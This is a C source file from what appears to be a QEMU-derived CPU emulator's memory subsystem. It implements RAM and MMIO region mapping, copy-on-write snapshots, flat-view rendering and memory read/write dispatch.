MemoryRegion *memory_map_ptr(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms, void *ptr) { MemoryRegion *ram = g_new(MemoryRegion, 1); memory_region_init_ram_ptr(uc, ram, size, ptr); ram->perms = perms; if (ram->addr == -1 || !ram->ram_block) { // out of memory g_free(ram); return NULL; } memory_region_add_subregion(uc->system_memory, begin, ram); if (uc->cpu) { tlb_flush(uc->cpu); } return ram; } static void make_contained(struct uc_struct *uc, MemoryRegion *current) { hwaddr addr = current->addr; MemoryRegion *container = g_new(MemoryRegion, 1); memory_region_init(uc, container, int128_get64(current->size)); memory_region_del_subregion(uc->system_memory, current); memory_region_add_subregion_overlap(container, 0, current, current->priority); memory_region_add_subregion(uc->system_memory, addr, container); } MemoryRegion *memory_cow(struct uc_struct *uc, MemoryRegion *current, hwaddr begin, size_t size) { hwaddr offset; hwaddr current_offset; MemoryRegion *ram = g_new(MemoryRegion, 1); assert((begin & ~TARGET_PAGE_MASK) == 0); assert((size & ~TARGET_PAGE_MASK) == 0); if (current->container == uc->system_memory) { make_contained(uc, current); } offset = begin - current->container->addr;; current_offset = offset - current->addr; memory_region_init_ram(uc, ram, size, current->perms); if (ram->addr == -1 || !ram->ram_block) { g_free(ram); return NULL; } memory_region_transaction_begin(); memcpy(ramblock_ptr(ram->ram_block, 0), ramblock_ptr(current->ram_block, current_offset), size); memory_region_add_subregion_overlap(current->container, offset, ram, uc->snapshot_level); if (uc->cpu) { tlb_flush(uc->cpu); } uc->memory_region_update_pending = true; memory_region_transaction_commit(ram); return ram; } static uint64_t mmio_read_wrapper(struct uc_struct *uc, void *opaque, hwaddr addr, unsigned size) { mmio_cbs* cbs = (mmio_cbs*)opaque; // We have to care about 32bit target. addr = addr & ( (target_ulong)(-1) ); if (cbs->read) { return cbs->read(uc, addr, size, cbs->user_data_read); } else { return 0; } } static void mmio_write_wrapper(struct uc_struct *uc, void *opaque, hwaddr addr, uint64_t data, unsigned size) { mmio_cbs* cbs = (mmio_cbs*)opaque; // We have to care about 32bit target. addr = addr & ( (target_ulong)(-1) ); if (cbs->write) { cbs->write(uc, addr, size, data, cbs->user_data_write); } } static void mmio_region_destructor_uc(MemoryRegion *mr) { g_free(mr->opaque); } MemoryRegion *memory_map_io(struct uc_struct *uc, ram_addr_t begin, size_t size, uc_cb_mmio_read_t read_cb, uc_cb_mmio_write_t write_cb, void *user_data_read, void *user_data_write) { MemoryRegion *mmio = g_new(MemoryRegion, 1); mmio_cbs* opaques = g_new(mmio_cbs, 1); MemoryRegionOps *ops = &opaques->ops; opaques->read = read_cb; opaques->write = write_cb; opaques->user_data_read = user_data_read; opaques->user_data_write = user_data_write; memset(ops, 0, sizeof(*ops)); ops->read = mmio_read_wrapper; ops->read_with_attrs = NULL; ops->write = mmio_write_wrapper; ops->write_with_attrs = NULL; ops->endianness = DEVICE_NATIVE_ENDIAN; memory_region_init_io(uc, mmio, ops, opaques, size); mmio->destructor = mmio_region_destructor_uc; mmio->perms = 0; if (read_cb) mmio->perms |= UC_PROT_READ; if (write_cb) mmio->perms |= UC_PROT_WRITE; memory_region_add_subregion(uc->system_memory, begin, mmio); if (uc->cpu) tlb_flush(uc->cpu); return mmio; } void memory_region_filter_subregions(MemoryRegion *mr, int32_t level) { MemoryRegion *subregion, *subregion_next; memory_region_transaction_begin(); QTAILQ_FOREACH_SAFE(subregion, &mr->subregions, subregions_link, subregion_next) { if (subregion->priority >= level) { memory_region_del_subregion(mr, subregion); subregion->destructor(subregion); g_free(subregion); mr->uc->memory_region_update_pending = true; } } memory_region_transaction_commit(mr); } static void memory_region_remove_mapped_block(struct uc_struct *uc, MemoryRegion *mr, bool free) { size_t i; for (i = 0; i < uc->mapped_block_count; i++) { if (uc->mapped_blocks[i] == mr) { uc->mapped_block_count--; //shift remainder of array down over deleted pointer memmove(&uc->mapped_blocks[i], &uc->mapped_blocks[i + 1], sizeof(MemoryRegion*) * (uc->mapped_block_count - i)); if (free) { mr->destructor(mr); g_free(mr); } break; } } } void memory_moveout(struct uc_struct *uc, MemoryRegion *mr) { hwaddr addr; /* A bit dirty, but it works. * The first subregion will be the one with the smalest priority. * In case of CoW this will always be the region which is mapped initial and later be moved in the subregion of the container. * The initial subregion is the one stored in mapped_blocks * Because CoW is done after the snapshot level is increased there is only on subregion with */ memory_region_transaction_begin(); MemoryRegion *mr_block = QTAILQ_FIRST(&mr->subregions); if (!mr_block) { mr_block = mr; } if (uc->cpu) { // We also need to remove all tb cache uc->uc_invalidate_tb(uc, mr->addr, int128_get64(mr->size)); // Make sure all pages associated with the MemoryRegion are flushed // Only need to do this if we are in a running state for (addr = mr->addr; (int64_t)(mr->end - addr) > 0; addr += uc->target_page_size) { tlb_flush_page(uc->cpu, addr); } } memory_region_del_subregion(uc->system_memory, mr); g_array_append_val(uc->unmapped_regions, mr); memory_region_remove_mapped_block(uc, mr_block, false); uc->memory_region_update_pending = true; memory_region_transaction_commit(uc->system_memory); /* dirty hack to save the snapshot level */ mr->container = (void *)(intptr_t)uc->snapshot_level; } void memory_movein(struct uc_struct *uc, MemoryRegion *mr) { memory_region_transaction_begin(); memory_region_add_subregion_overlap(uc->system_memory, mr->addr, mr, mr->priority); uc->memory_region_update_pending = true; memory_region_transaction_commit(uc->system_memory); } void memory_unmap(struct uc_struct *uc, MemoryRegion *mr) { hwaddr addr; if (uc->cpu) { // We also need to remove all tb cache uc->uc_invalidate_tb(uc, mr->addr, int128_get64(mr->size)); // Make sure all pages associated with the MemoryRegion are flushed // Only need to do this if we are in a running state for (addr = mr->addr; (int64_t)(mr->end - addr) > 0; addr += uc->target_page_size) { tlb_flush_page(uc->cpu, addr); } } memory_region_del_subregion(uc->system_memory, mr); memory_region_remove_mapped_block(uc, mr, true); } int memory_free(struct uc_struct *uc) { MemoryRegion *subregion, *subregion_next; MemoryRegion *mr = uc->system_memory; QTAILQ_FOREACH_SAFE(subregion, &mr->subregions, subregions_link, subregion_next) { subregion->enabled = false; memory_region_del_subregion(uc->system_memory, subregion); subregion->destructor(subregion); /* destroy subregion */ g_free(subregion); } return 0; } static AddrRange addrrange_make(Int128 start, Int128 size) { return (AddrRange) { start, size }; } static bool addrrange_equal(AddrRange r1, AddrRange r2) { return int128_eq(r1.start, r2.start) && int128_eq(r1.size, r2.size); } static Int128 addrrange_end(AddrRange r) { return int128_add(r.start, r.size); } static bool addrrange_contains(AddrRange range, Int128 addr) { return int128_ge(addr, range.start) && int128_lt(addr, addrrange_end(range)); } static bool addrrange_intersects(AddrRange r1, AddrRange r2) { return addrrange_contains(r1, r2.start) || addrrange_contains(r2, r1.start); } static AddrRange addrrange_intersection(AddrRange r1, AddrRange r2) { Int128 start = int128_max(r1.start, r2.start); Int128 end = int128_min(addrrange_end(r1), addrrange_end(r2)); return addrrange_make(start, int128_sub(end, start)); } enum ListenerDirection { Forward, Reverse }; #define MEMORY_LISTENER_CALL_GLOBAL(uc, _callback, _direction) \ do { \ MemoryListener *_listener; \ \ switch (_direction) { \ case Forward: \ QTAILQ_FOREACH(_listener, &uc->memory_listeners, link) { \ if (_listener->_callback) { \ _listener->_callback(_listener); \ } \ } \ break; \ case Reverse: \ QTAILQ_FOREACH_REVERSE(_listener, &uc->memory_listeners, link) { \ if (_listener->_callback) { \ _listener->_callback(_listener); \ } \ } \ break; \ default: \ abort(); \ } \ } while (0) #define MEMORY_LISTENER_CALL(_as, _callback, _direction, _section) \ do { \ MemoryListener *_listener; \ \ switch (_direction) { \ case Forward: \ QTAILQ_FOREACH(_listener, &(_as)->listeners, link_as) { \ if (_listener->_callback) { \ _listener->_callback(_listener, _section); \ } \ } \ break; \ case Reverse: \ QTAILQ_FOREACH_REVERSE(_listener, &(_as)->listeners, link_as) { \ if (_listener->_callback) { \ _listener->_callback(_listener, _section); \ } \ } \ break; \ default: \ abort(); \ } \ } while (0) /* No need to ref/unref .mr, the FlatRange keeps it alive. */ #define MEMORY_LISTENER_UPDATE_REGION(fr, as, dir, callback) \ do { \ MemoryRegionSection mrs = section_from_flat_range(fr, \ address_space_to_flatview(as)); \ MEMORY_LISTENER_CALL(as, callback, dir, &mrs); \ } while(0) /* Range of memory in the global map. Addresses are absolute. */ struct FlatRange { MemoryRegion *mr; hwaddr offset_in_region; AddrRange addr; bool readonly; }; #define FOR_EACH_FLAT_RANGE(var, view) \ for (var = (view)->ranges; var < (view)->ranges + (view)->nr; ++var) static inline MemoryRegionSection section_from_flat_range(FlatRange *fr, FlatView *fv) { return (MemoryRegionSection) { .mr = fr->mr, .fv = fv, .offset_within_region = fr->offset_in_region, .size = fr->addr.size, .offset_within_address_space = int128_get64(fr->addr.start), .readonly = fr->readonly, }; } static bool flatrange_equal(FlatRange *a, FlatRange *b) { return a->mr == b->mr && addrrange_equal(a->addr, b->addr) && a->offset_in_region == b->offset_in_region && a->readonly == b->readonly; } static FlatView *flatview_new(MemoryRegion *mr_root) { FlatView *view; view = g_new0(FlatView, 1); view->ref = 1; view->root = mr_root; return view; } /* Insert a range into a given position. Caller is responsible for maintaining * sorting order. */ static void flatview_insert(FlatView *view, unsigned pos, FlatRange *range) { if (view->nr == view->nr_allocated) { view->nr_allocated = MAX(2 * view->nr, 10); view->ranges = g_realloc(view->ranges, view->nr_allocated * sizeof(*view->ranges)); } memmove(view->ranges + pos + 1, view->ranges + pos, (view->nr - pos) * sizeof(FlatRange)); view->ranges[pos] = *range; ++view->nr; } static inline void flatview_ref(FlatView *view) { view->ref++; } static void flatview_destroy(FlatView *view) { if (view->dispatch) { address_space_dispatch_free(view->dispatch); } g_free(view->ranges); g_free(view); } void flatview_unref(FlatView *view) { view->ref--; if (view->ref <= 0) { flatview_destroy(view); } } static bool can_merge(FlatRange *r1, FlatRange *r2) { return int128_eq(addrrange_end(r1->addr), r2->addr.start) && r1->mr == r2->mr && int128_eq(int128_add(int128_make64(r1->offset_in_region), r1->addr.size), int128_make64(r2->offset_in_region)) && r1->readonly == r2->readonly; } /* Attempt to simplify a view by merging adjacent ranges */ static void flatview_simplify(FlatView *view) { unsigned i, j; i = 0; while (i < view->nr) { j = i + 1; while (j < view->nr && can_merge(&view->ranges[j-1], &view->ranges[j])) { int128_addto(&view->ranges[i].addr.size, view->ranges[j].addr.size); ++j; } ++i; memmove(&view->ranges[i], &view->ranges[j], (view->nr - j) * sizeof(view->ranges[j])); view->nr -= j - i; } } static bool memory_region_big_endian(MemoryRegion *mr) { #ifdef TARGET_WORDS_BIGENDIAN return mr->ops->endianness != DEVICE_LITTLE_ENDIAN; #else return mr->ops->endianness == DEVICE_BIG_ENDIAN; #endif } static void adjust_endianness(MemoryRegion *mr, uint64_t *data, MemOp op) { if ((op & MO_BSWAP) != devend_memop(mr->ops->endianness)) { switch (op & MO_SIZE) { case MO_8: break; case MO_16: *data = bswap16(*data); break; case MO_32: *data = bswap32(*data); break; case MO_64: *data = bswap64(*data); break; default: g_assert_not_reached(); } } } static inline void memory_region_shift_read_access(uint64_t *value, signed shift, uint64_t mask, uint64_t tmp) { if (shift >= 0) { *value |= (tmp & mask) << shift; } else { *value |= (tmp & mask) >> -shift; } } static inline uint64_t memory_region_shift_write_access(uint64_t *value, signed shift, uint64_t mask) { uint64_t tmp; if (shift >= 0) { tmp = (*value >> shift) & mask; } else { tmp = (*value << -shift) & mask; } return tmp; } static MemTxResult memory_region_read_accessor(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *value, unsigned size, signed shift, uint64_t mask, MemTxAttrs attrs) { uint64_t tmp; tmp = mr->ops->read(uc, mr->opaque, addr, size); memory_region_shift_read_access(value, shift, mask, tmp); return MEMTX_OK; } static MemTxResult memory_region_read_with_attrs_accessor(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *value, unsigned size, signed shift, uint64_t mask, MemTxAttrs attrs) { uint64_t tmp = 0; MemTxResult r; r = mr->ops->read_with_attrs(uc, mr->opaque, addr, &tmp, size, attrs); memory_region_shift_read_access(value, shift, mask, tmp); return r; } static MemTxResult memory_region_write_accessor(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *value, unsigned size, signed shift, uint64_t mask, MemTxAttrs attrs) { uint64_t tmp = memory_region_shift_write_access(value, shift, mask); mr->ops->write(uc, mr->opaque, addr, tmp, size); return MEMTX_OK; } static MemTxResult memory_region_write_with_attrs_accessor(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *value, unsigned size, signed shift, uint64_t mask, MemTxAttrs attrs) { uint64_t tmp = memory_region_shift_write_access(value, shift, mask); return mr->ops->write_with_attrs(uc, mr->opaque, addr, tmp, size, attrs); } static MemTxResult access_with_adjusted_size(struct uc_struct *uc, hwaddr addr, uint64_t *value, unsigned size, unsigned access_size_min, unsigned access_size_max, MemTxResult (*access_fn) (struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *value, unsigned size, signed shift, uint64_t mask, MemTxAttrs attrs), MemoryRegion *mr, MemTxAttrs attrs) { uint64_t access_mask; unsigned access_size; unsigned i; MemTxResult r = MEMTX_OK; if (!access_size_min) { access_size_min = 1; } if (!access_size_max) { access_size_max = 4; } /* FIXME: support unaligned access? */ access_size = MAX(MIN(size, access_size_max), access_size_min); access_mask = MAKE_64BIT_MASK(0, access_size * 8); if (memory_region_big_endian(mr)) { for (i = 0; i < size; i += access_size) { r |= access_fn(uc, mr, addr + i, value, access_size, (size - access_size - i) * 8, access_mask, attrs); } } else { for (i = 0; i < size; i += access_size) { r |= access_fn(uc, mr, addr + i, value, access_size, i * 8, access_mask, attrs); } } return r; } static AddressSpace *memory_region_to_address_space(MemoryRegion *mr) { AddressSpace *as; while (mr->container) { mr = mr->container; } QTAILQ_FOREACH(as, &mr->uc->address_spaces, address_spaces_link) { if (mr == as->root) { return as; } } return NULL; } /* Render a memory region into the global view. Ranges in @view obscure * ranges in @mr. */ static void render_memory_region(FlatView *view, MemoryRegion *mr, Int128 base, AddrRange clip, bool readonly) { MemoryRegion *subregion; unsigned i; hwaddr offset_in_region; Int128 remain; Int128 now; FlatRange fr; AddrRange tmp; if (!mr->enabled) { return; } int128_addto(&base, int128_make64(mr->addr)); readonly |= mr->readonly; tmp = addrrange_make(base, mr->size); if (!addrrange_intersects(tmp, clip)) { return; } clip = addrrange_intersection(tmp, clip); /* Render subregions in priority order. */ QTAILQ_FOREACH(subregion, &mr->subregions, subregions_link) { render_memory_region(view, subregion, base, clip, readonly); } if (!mr->terminates) { return; } offset_in_region = int128_get64(int128_sub(clip.start, base)); base = clip.start; remain = clip.size; fr.mr = mr; fr.readonly = readonly; /* Render the region itself into any gaps left by the current view. */ for (i = 0; i < view->nr && int128_nz(remain); ++i) { if (int128_ge(base, addrrange_end(view->ranges[i].addr))) { continue; } if (int128_lt(base, view->ranges[i].addr.start)) { now = int128_min(remain, int128_sub(view->ranges[i].addr.start, base)); fr.offset_in_region = offset_in_region; fr.addr = addrrange_make(base, now); flatview_insert(view, i, &fr); ++i; int128_addto(&base, now); offset_in_region += int128_get64(now); int128_subfrom(&remain, now); } now = int128_sub(int128_min(int128_add(base, remain), addrrange_end(view->ranges[i].addr)), base); int128_addto(&base, now); offset_in_region += int128_get64(now); int128_subfrom(&remain, now); } if (int128_nz(remain)) { fr.offset_in_region = offset_in_region; fr.addr = addrrange_make(base, remain); flatview_insert(view, i, &fr); } } static MemoryRegion *memory_region_get_flatview_root(MemoryRegion *mr) { while (mr->enabled) { if (!mr->terminates) { unsigned int found = 0; MemoryRegion *child, *next = NULL; QTAILQ_FOREACH(child, &mr->subregions, subregions_link) { if (child->enabled) { if (++found > 1) { next = NULL; break; } if (!child->addr && int128_ge(mr->size, child->size)) { /* A child is included in its entirety. If it's the only * enabled one, use it in the hope of finding an alias down the * way. This will also let us share FlatViews. */ next = child; } } } if (found == 0) { return NULL; } if (next) { mr = next; continue; } } return mr; } return NULL; } /* Render a memory topology into a list of disjoint absolute ranges. */ static FlatView *generate_memory_topology(struct uc_struct *uc, MemoryRegion *mr) { int i; FlatView *view; view = flatview_new(mr); if (mr) { render_memory_region(view, mr, int128_zero(), addrrange_make(int128_zero(), int128_2_64()), false); } flatview_simplify(view); view->dispatch = address_space_dispatch_new(uc, view); for (i = 0; i < view->nr; i++) { MemoryRegionSection mrs = section_from_flat_range(&view->ranges[i], view); flatview_add_to_dispatch(uc, view, &mrs); } address_space_dispatch_compact(view->dispatch); g_hash_table_replace(uc->flat_views, mr, view); return view; } FlatView *address_space_get_flatview(AddressSpace *as) { FlatView *view; view = address_space_to_flatview(as); return view; } static void address_space_update_topology_pass(AddressSpace *as, const FlatView *old_view, const FlatView *new_view, bool adding) { unsigned iold, inew; FlatRange *frold, *frnew; /* Generate a symmetric difference of the old and new memory maps. * Kill ranges in the old map, and instantiate ranges in the new map. */ iold = inew = 0; while (iold < old_view->nr || inew < new_view->nr) { if (iold < old_view->nr) { frold = &old_view->ranges[iold]; } else { frold = NULL; } if (inew < new_view->nr) { frnew = &new_view->ranges[inew]; } else { frnew = NULL; } if (frold && (!frnew || int128_lt(frold->addr.start, frnew->addr.start) || (int128_eq(frold->addr.start, frnew->addr.start) && !flatrange_equal(frold, frnew)))) { /* In old but not in new, or in both but attributes changed. */ if (!adding) { MEMORY_LISTENER_UPDATE_REGION(frold, as, Reverse, region_del); } ++iold; } else if (frold && frnew && flatrange_equal(frold, frnew)) { /* In both and unchanged (except logging may have changed) */ if (adding) { MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_nop); } ++iold; ++inew; } else { /* In new */ if (adding) { MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_add); } ++inew; } } } static void flatviews_init(struct uc_struct *uc) { if (uc->flat_views) { return; } uc->flat_views = g_hash_table_new_full(NULL, NULL, NULL, (GDestroyNotify) flatview_unref); if (!uc->empty_view) { uc->empty_view = generate_memory_topology(uc, NULL); /* We keep it alive forever in the global variable. */ flatview_ref(uc->empty_view); g_hash_table_replace(uc->flat_views, NULL, uc->empty_view); } } static void flatviews_reset(struct uc_struct *uc) { AddressSpace *as; if (uc->flat_views) { g_hash_table_destroy(uc->flat_views); uc->flat_views = NULL; } flatviews_init(uc); /* Render unique FVs */ QTAILQ_FOREACH(as, &uc->address_spaces, address_spaces_link) { MemoryRegion *physmr = memory_region_get_flatview_root(as->root); if (g_hash_table_lookup(uc->flat_views, physmr)) { continue; } generate_memory_topology(uc, physmr); } } static void address_space_set_flatview(AddressSpace *as) { FlatView *old_view = address_space_to_flatview(as); MemoryRegion *physmr = memory_region_get_flatview_root(as->root); FlatView *new_view = g_hash_table_lookup(as->uc->flat_views, physmr); assert(new_view); if (old_view == new_view) { return; } flatview_ref(new_view); if (!QTAILQ_EMPTY(&as->listeners)) { FlatView tmpview = { .nr = 0 }, *old_view2 = old_view; if (!old_view2) { old_view2 = &tmpview; } address_space_update_topology_pass(as, old_view2, new_view, false); address_space_update_topology_pass(as, old_view2, new_view, true); } as->current_map = new_view; if (old_view) { flatview_unref(old_view); } } static void address_space_update_topology(AddressSpace *as) { MemoryRegion *physmr = memory_region_get_flatview_root(as->root); flatviews_init(as->uc); if (!g_hash_table_lookup(as->uc->flat_views, physmr)) { generate_memory_topology(as->uc, physmr); } address_space_set_flatview(as); } void memory_region_transaction_begin(void) { } void memory_region_transaction_commit(MemoryRegion *mr) { AddressSpace *as; if (mr->uc->memory_region_update_pending) { flatviews_reset(mr->uc); MEMORY_LISTENER_CALL_GLOBAL(mr->uc, begin, Forward); QTAILQ_FOREACH(as, &mr->uc->address_spaces, address_spaces_link) { address_space_set_flatview(as); } mr->uc->memory_region_update_pending = false; MEMORY_LISTENER_CALL_GLOBAL(mr->uc, commit, Forward); } } static void memory_region_destructor_none(MemoryRegion *mr) { } static void memory_region_destructor_ram(MemoryRegion *mr) { memory_region_filter_subregions(mr, 0); qemu_ram_free(mr->uc, mr->ram_block); } void memory_region_init(struct uc_struct *uc, MemoryRegion *mr, uint64_t size) { memset(mr, 0, sizeof(*mr)); mr->uc = uc; /* memory_region_initfn */ mr->ops = &unassigned_mem_ops; mr->enabled = true; mr->destructor = memory_region_destructor_none; QTAILQ_INIT(&mr->subregions); mr->size = int128_make64(size); if (size == UINT64_MAX) { mr->size = int128_2_64(); } } static uint64_t unassigned_mem_read(void *opaque, hwaddr addr, unsigned size) { #ifdef DEBUG_UNASSIGNED printf("Unassigned mem read " TARGET_FMT_plx "\n", addr); #endif return 0; } static void unassigned_mem_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) { #ifdef DEBUG_UNASSIGNED printf("Unassigned mem write " TARGET_FMT_plx " = 0x%"PRIx64"\n", addr, val); #endif } static bool unassigned_mem_accepts(struct uc_struct *uc, void *opaque, hwaddr addr, unsigned size, bool is_write, MemTxAttrs attrs) { return false; } const MemoryRegionOps unassigned_mem_ops = { .valid.accepts = unassigned_mem_accepts, .endianness = DEVICE_NATIVE_ENDIAN, }; bool memory_region_access_valid(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, unsigned size, bool is_write, MemTxAttrs attrs) { if (mr->ops->valid.accepts && !mr->ops->valid.accepts(uc, mr->opaque, addr, size, is_write, attrs)) { return false; } if (!mr->ops->valid.unaligned && (addr & (size - 1))) { return false; } /* Treat zero as compatibility all valid */ if (!mr->ops->valid.max_access_size) { return true; } if (size > mr->ops->valid.max_access_size || size < mr->ops->valid.min_access_size) { return false; } return true; } static MemTxResult memory_region_dispatch_read1(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *pval, unsigned size, MemTxAttrs attrs) { *pval = 0; if (mr->ops->read) { return access_with_adjusted_size(uc, addr, pval, size, mr->ops->impl.min_access_size, mr->ops->impl.max_access_size, memory_region_read_accessor, mr, attrs); } else { return access_with_adjusted_size(uc, addr, pval, size, mr->ops->impl.min_access_size, mr->ops->impl.max_access_size, memory_region_read_with_attrs_accessor, mr, attrs); } } MemTxResult memory_region_dispatch_read(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *pval, MemOp op, MemTxAttrs attrs) { unsigned size = memop_size(op); MemTxResult r; if (!memory_region_access_valid(uc, mr, addr, size, false, attrs)) { *pval = unassigned_mem_read(mr, addr, size); return MEMTX_DECODE_ERROR; } r = memory_region_dispatch_read1(uc, mr, addr, pval, size, attrs); adjust_endianness(mr, pval, op); return r; } MemTxResult memory_region_dispatch_write(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t data, MemOp op, MemTxAttrs attrs) { unsigned size = memop_size(op); if (!memory_region_access_valid(uc, mr, addr, size, true, attrs)) { unassigned_mem_write(mr, addr, data, size); return MEMTX_DECODE_ERROR; } adjust_endianness(mr, &data, op); if (mr->ops->write) { return access_with_adjusted_size(uc, addr, &data, size, mr->ops->impl.min_access_size, mr->ops->impl.max_access_size, memory_region_write_accessor, mr, attrs); } else { return access_with_adjusted_size(uc, addr, &data, size, mr->ops->impl.min_access_size, mr->ops->impl.max_access_size, memory_region_write_with_attrs_accessor, mr, attrs); } } void memory_region_init_io(struct uc_struct *uc, MemoryRegion *mr, const MemoryRegionOps *ops, void *opaque, uint64_t size) { memory_region_init(uc, mr, size); mr->ops = ops ? ops : &unassigned_mem_ops; mr->opaque = opaque; mr->terminates = true; } void memory_region_init_ram_ptr(struct uc_struct *uc, MemoryRegion *mr, uint64_t size, void *ptr) { memory_region_init(uc, mr, size); mr->ram = true; mr->terminates = true; mr->destructor = memory_region_destructor_ram; /* qemu_ram_alloc_from_ptr cannot fail with ptr != NULL. */ assert(ptr != NULL); mr->ram_block = qemu_ram_alloc_from_ptr(uc, size, ptr, mr); } uint64_t memory_region_size(MemoryRegion *mr) { if (int128_eq(mr->size, int128_2_64())) { return UINT64_MAX; } return int128_get64(mr->size); } void memory_region_set_readonly(MemoryRegion *mr, bool readonly) { if (mr->readonly != readonly) { memory_region_transaction_begin(); mr->readonly = readonly; mr->uc->memory_region_update_pending |= mr->enabled; memory_region_transaction_commit(mr); } } void *memory_region_get_ram_ptr(MemoryRegion *mr) { void *ptr; ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, 0); return ptr; } MemoryRegion *memory_region_from_host(struct uc_struct *uc, void *ptr, ram_addr_t *offset) { RAMBlock *block; block = qemu_ram_block_from_host(uc, ptr, false, offset); if (!block) { return NULL; } return block->mr; } ram_addr_t memory_region_get_ram_addr(MemoryRegion *mr) { return mr->ram_block ? mr->ram_block->offset : RAM_ADDR_INVALID; } static void memory_region_update_container_subregions(MemoryRegion *subregion) { MemoryRegion *mr = subregion->container; MemoryRegion *other; memory_region_transaction_begin(); QTAILQ_FOREACH(other, &mr->subregions, subregions_link) { if (subregion->priority >= other->priority) { QTAILQ_INSERT_BEFORE(other, subregion, subregions_link); goto done; } } QTAILQ_INSERT_TAIL(&mr->subregions, subregion, subregions_link); done: mr->uc->memory_region_update_pending = true; memory_region_transaction_commit(mr); } static void memory_region_add_subregion_common(MemoryRegion *mr, hwaddr offset, MemoryRegion *subregion) { assert(!subregion->container); subregion->container = mr; subregion->addr = offset; subregion->end = offset + int128_get64(subregion->size); memory_region_update_container_subregions(subregion); } void memory_region_add_subregion(MemoryRegion *mr, hwaddr offset, MemoryRegion *subregion) { subregion->priority = 0; memory_region_add_subregion_common(mr, offset, subregion); } void memory_region_add_subregion_overlap(MemoryRegion *mr, hwaddr offset, MemoryRegion *subregion, int priority) { subregion->priority = priority; memory_region_add_subregion_common(mr, offset, subregion); } void memory_region_del_subregion(MemoryRegion *mr, MemoryRegion *subregion) { memory_region_transaction_begin(); assert(subregion->container == mr); subregion->container = NULL; QTAILQ_REMOVE(&mr->subregions, subregion, subregions_link); mr->uc->memory_region_update_pending = true; memory_region_transaction_commit(mr); } static int cmp_flatrange_addr(const void *addr_, const void *fr_) { const AddrRange *addr = addr_; const FlatRange *fr = fr_; if (int128_le(addrrange_end(*addr), fr->addr.start)) { return -1; } else if (int128_ge(addr->start, addrrange_end(fr->addr))) { return 1; } return 0; } static FlatRange *flatview_lookup(FlatView *view, AddrRange addr) { return bsearch(&addr, view->ranges, view->nr, sizeof(FlatRange), cmp_flatrange_addr); } /* Same as memory_region_find, but it does not add a reference to the * returned region. It must be called from an RCU critical section. */ static MemoryRegionSection memory_region_find_rcu(MemoryRegion *mr, hwaddr addr, uint64_t size) { MemoryRegionSection ret = { .mr = NULL }; MemoryRegion *root; AddressSpace *as; AddrRange range; FlatView *view; FlatRange *fr; addr += mr->addr; for (root = mr; root->container; ) { root = root->container; addr += root->addr; } as = memory_region_to_address_space(root); if (!as) { return ret; } range = addrrange_make(int128_make64(addr), int128_make64(size)); view = address_space_to_flatview(as); fr = flatview_lookup(view, range); if (!fr) { return ret; } while (fr > view->ranges && addrrange_intersects(fr[-1].addr, range)) { --fr; } ret.mr = fr->mr; ret.fv = view; range = addrrange_intersection(range, fr->addr); ret.offset_within_region = fr->offset_in_region; ret.offset_within_region += int128_get64(int128_sub(range.start, fr->addr.start)); ret.size = range.size; ret.offset_within_address_space = int128_get64(range.start); ret.readonly = fr->readonly; return ret; } MemoryRegionSection memory_region_find(MemoryRegion *mr, hwaddr addr, uint64_t size) { MemoryRegionSection ret; ret = memory_region_find_rcu(mr, addr, size); return ret; } static void listener_add_address_space(MemoryListener *listener, AddressSpace *as) { FlatView *view; FlatRange *fr; if (listener->begin) { listener->begin(listener); } view = address_space_get_flatview(as); FOR_EACH_FLAT_RANGE(fr, view) { MemoryRegionSection section = section_from_flat_range(fr, view); if (listener->region_add) { listener->region_add(listener, §ion); } } if (listener->commit) { listener->commit(listener); } } static void listener_del_address_space(MemoryListener *listener, AddressSpace *as) { FlatView *view; FlatRange *fr; if (listener->begin) { listener->begin(listener); } view = address_space_get_flatview(as); FOR_EACH_FLAT_RANGE(fr, view) { MemoryRegionSection section = section_from_flat_range(fr, view); if (listener->region_del) { listener->region_del(listener, §ion); } } if (listener->commit) { listener->commit(listener); } } void memory_listener_register(MemoryListener *listener, AddressSpace *as) { listener->address_space = as; QTAILQ_INSERT_TAIL(&as->uc->memory_listeners, listener, link); QTAILQ_INSERT_TAIL(&as->listeners, listener, link_as); listener_add_address_space(listener, as); } void memory_listener_unregister(MemoryListener *listener) { if (!listener->address_space) { return; } listener_del_address_space(listener, listener->address_space); QTAILQ_REMOVE(&listener->address_space->uc->memory_listeners, listener, link); QTAILQ_REMOVE(&listener->address_space->listeners, listener, link_as); listener->address_space = NULL; } void address_space_remove_listeners(AddressSpace *as) { while (!QTAILQ_EMPTY(&as->listeners)) { memory_listener_unregister(QTAILQ_FIRST(&as->listeners)); } } void address_space_init(struct uc_struct *uc, AddressSpace *as, MemoryRegion *root) { as->uc = uc; as->root = root; as->current_map = NULL; QTAILQ_INIT(&as->listeners); QTAILQ_INSERT_TAIL(&uc->address_spaces, as, address_spaces_link); address_space_update_topology(as); } void address_space_destroy(AddressSpace *as) { MemoryRegion *root = as->root; /* Flush out anything from MemoryListeners listening in on this */ memory_region_transaction_begin(); as->root = NULL; memory_region_transaction_commit(root); QTAILQ_REMOVE(&as->uc->address_spaces, as, address_spaces_link); /* At this point, as->dispatch and as->current_map are dummy * entries that the guest should never use. Wait for the old * values to expire before freeing the data. */ as->root = root; flatview_unref(as->current_map); } void memory_region_init_ram(struct uc_struct *uc, MemoryRegion *mr, uint64_t size, uint32_t perms) { memory_region_init(uc, mr, size); mr->ram = true; if (!(perms & UC_PROT_WRITE)) { mr->readonly = true; } mr->perms = perms; mr->terminates = true; mr->destructor = memory_region_destructor_ram; mr->ram_block = qemu_ram_alloc(uc, size, mr); } 